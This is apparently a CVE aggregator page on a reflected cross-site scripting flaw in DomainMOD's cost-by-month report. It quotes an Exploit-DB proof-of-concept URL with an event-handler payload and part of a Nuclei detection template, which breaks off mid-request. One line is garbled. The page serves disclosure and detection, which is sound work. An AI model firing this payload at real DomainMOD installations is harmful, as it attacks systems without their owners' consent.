CVE-2019-15811
published 2019-08-29CVE-2019-15811: In DomainMOD through 4.13, the parameter daterange in the file reporting/domains/cost-by-month.php has XSS.
PriorityP342medium6.1CVSS 3.0
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
6.40%
92.8th percentile
In DomainMOD through 4.13, the parameter daterange in the file reporting/domains/cost-by-month.php has XSS.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| domainmod | domainmod | <= 4.13.0 | — |
CVSS provenance
nvdv3.06.1MEDIUMCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DomainMod 4.13 - Cross-Site Scripting
exploitdb·2019-08-30·CVSS 6.1
CVE-2019-15811 [MEDIUM] DomainMod 4.13 - Cross-Site Scripting
DomainMod 4.13 - Cross-Site Scripting
---
# Exploit Title: DomainMod <= 4.13 - Cross-Site Scripting
# Date: 30 August 2019
# Exploit Author: Damian Ebelties (https://zerodays.lol/)
# Vendor Homepage: https://domainmod.org/
# Version: <= 4.13
# Tested on: Ubuntu 18.04.1
# CVE: CVE-2019-15811
The software 'DomainMOD' is vulnerable for Cross-Site Scripting in the
file '/reporting/domains/cost-by-month.php' in the parameter 'daterange'.
As of today (30 August 2019) this issue is unfixed.
Almost all other files that use the parameter 'daterange' are vulnerable.
See: https://github.com/domainmod/domainmod/tree/master/reporting/domains
Proof-of-Concept:
https://domain.tld/reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(1)%22autofocus=%22
Nuclei
DomainMOD <=4.13.0 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-15811 [MEDIUM] DomainMOD <=4.13.0 - Cross-Site Scripting
DomainMOD =4.13.1) to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/47325
- https://github.com/domainmod/domainmod/issues/108
- https://nvd.nist.gov/vuln/detail/CVE-2019-15811
- https://zerodays.lol/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-15811
cwe-id: CWE-79
epss-score: 0.01196
epss-percentile: 0.78906
cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: domainmod
product: domainmod
tags: cve,cve2019,domainmod,xss,authenticated,edb,vuln
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
new_username={{username}}&new_password={{password}}
- |
GE
No writeups or analysis indexed.
http://packetstormsecurity.com/files/154270/DomainMod-4.13-Cross-Site-Scripting.htmlhttps://github.com/domainmod/domainmod/issues/108https://zerodays.lol/http://packetstormsecurity.com/files/154270/DomainMod-4.13-Cross-Site-Scripting.htmlhttps://github.com/domainmod/domainmod/issues/108https://zerodays.lol/
2019-08-29
Published